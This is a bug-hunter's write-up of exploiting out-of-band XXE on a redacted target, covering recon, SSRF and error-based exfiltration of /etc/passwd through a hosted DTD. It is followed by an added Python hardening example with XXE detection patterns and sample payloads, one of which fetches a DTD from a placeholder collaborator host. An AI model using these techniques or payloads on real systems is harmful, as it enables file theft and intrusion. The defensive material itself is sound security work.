Exploiting Out-of-Band XXE in the Wild

Phase 1 → Recon:

I like Shodan and enumerate IPs from it, so I collected a list of IPs related to my target, which we'll call redacted.com. After that I ran a full port scan with rustscan (you can use naabu or whatever you want), then HTTP-probed the results and started checking the unusual ports such as 8443, 8080, 8888, 9180, 9000, etc., passing all the requests through Burp. I came across an IP with port 9180 open that uses some XML content, so I tried a POST request with Content-Type: application/xml and got some errors! At this stage I decided to test for XXE, which you can read about and practice here, so let's try to exploit it!

Phase 2 → Analysis:

I tried the payload that was used to detect the vulnerability, but the response contained only errors, so I tried to retrieve local files directly using the classic payload:

Phase 3 → SSRF:

So I thought I couldn't get a P1 out of this, and then I tried to make the server perform an HTTP request to my Burp Collaborator (SSRF). I fired up Burp again and tried the following payload to perform SSRF through the XXE:

Filter responses that contain Connection refused

Phase 4 → OOB XXE:

Now I thought it was time to test out-of-band XXE, because I could make SSRF: if I hosted a malicious DTD file and used the SSRF to force the site to request it, maybe I could achieve the XXE. By the way, I told myself this was the final try to get this XXE. But before the exploitation, you need to understand what OOB XXE is and how it works.

https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
  1. The site requests our malicious DTD file
  2. Our malicious DTD reads the /etc/hostname file and sends it to my IP on port 1337
  3. My listener should receive a request containing the /etc/hostname file content

Phase 5 → XXE Final Exploitation:

In this stage I started doing what I know about OOB XXE attacks to get large file contents, such as base64, FTP, or even some tools that were used to get the data through FTP, but I failed in all of these ways :( But there was still something to try: getting large file contents via error messages. But how does it happen?

  1. Host a malicious DTD file that does two things:
  • defines an XML parameter entity containing the content of the /etc/passwd file.
  • defines an XML parameter entity containing a dynamic declaration of another XML parameter entity; this is evaluated by loading a nonexistent file whose name contains the pre-defined entity above, which in turn holds the /etc/passwd content.
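The endpoint in this write-up was exploitable because its parser honoured a DOCTYPE and fetched the entities it declared. The following is an added example written for this page (not code from the author or the target), showing the two controls a defender would put in front of such an endpoint in Python's standard-library expat: a request-body check that flags the DTD, entity and SYSTEM/PUBLIC markers every variant above relies on, and a parser that refuses a DOCTYPE outright, never expands parameter entities, and treats an external entity reference as an error instead of a fetch. The sample bodies are constructed; the collaborator hostname is a placeholder and the flat element-to-text result shape is an assumption about what such an API would need.

```python
import re
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or an entity reference."""


# Indicators worth logging at the edge: any of them in a client-supplied body
# is abnormal for an API that merely happens to accept application/xml.
XXE_INDICATORS = {
    "doctype": re.compile(rb"<!DOCTYPE", re.I),
    "entity_decl": re.compile(rb"<!ENTITY\s", re.I),
    "param_entity": re.compile(rb"<!ENTITY\s+%", re.I),
    "external_id": re.compile(rb"\b(SYSTEM|PUBLIC)\s+[\"']", re.I),
}


def xxe_indicators(body):
    """Return the names of the XXE indicators present in a request body."""
    return [name for name, rx in XXE_INDICATORS.items() if rx.search(body)]


def parse_untrusted_xml(data):
    """Parse client XML into {element: text}, refusing all DTD use.

    A DOCTYPE is rejected before any entity can be declared, parameter
    entities are never parsed, and an external entity reference aborts the
    parse instead of reading a file or contacting a remote host.
    """
    parser = expat.ParserCreate()
    fields = {}
    open_elements = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Untrusted input never needs a DTD: stop here, before any entity exists.
        raise UnsafeXMLError(f"DOCTYPE rejected (root={name!r}, SYSTEM={sysid!r})")

    def on_external_entity(context, base, sysid, pubid):
        # Returning 0 makes expat fail the parse rather than resolve sysid.
        return 0

    def on_start(name, attrs):
        open_elements.append(name)

    def on_end(name):
        open_elements.pop()

    def on_text(text):
        # Expat may deliver text in chunks, so append rather than assign.
        if open_elements and text.strip():
            fields[open_elements[-1]] = fields.get(open_elements[-1], "") + text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXMLError(f"malformed or disallowed XML: {exc}") from exc
    return fields


def is_rejected(data):
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXMLError:
        return True
    return False


# Constructed sample bodies: the benign request an endpoint expects, the
# classic local-file payload, and the out-of-band shape that pulls a DTD from
# an external host (placeholder hostname, nothing is ever fetched).
BENIGN = b"<login><user>alice</user><token>abc123</token></login>"
CLASSIC_XXE = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE login [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
               b"<login><user>&xxe;</user></login>")
OOB_XXE = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE login [<!ENTITY % dtd SYSTEM "http://collab.example/x.dtd"> %dtd;]>'
           b"<login><user>alice</user></login>")

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("classic", CLASSIC_XXE), ("oob", OOB_XXE)]:
        verdict = "rejected" if is_rejected(body) else parse_untrusted_xml(body)
        print(label, xxe_indicators(body), verdict)
```

The body check is what you would feed a WAF rule or a SIEM detection (a DOCTYPE in an API request is the signal, long before any collaborator callback); the parser configuration is the actual fix, since it removes the feature the whole chain in this post depends on. The same three settings map directly onto other parsers: disable DTDs, disable parameter entities, disable external entity resolution.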

Mahmoud Youssef

Cyber Security Researcher | Bug Hunter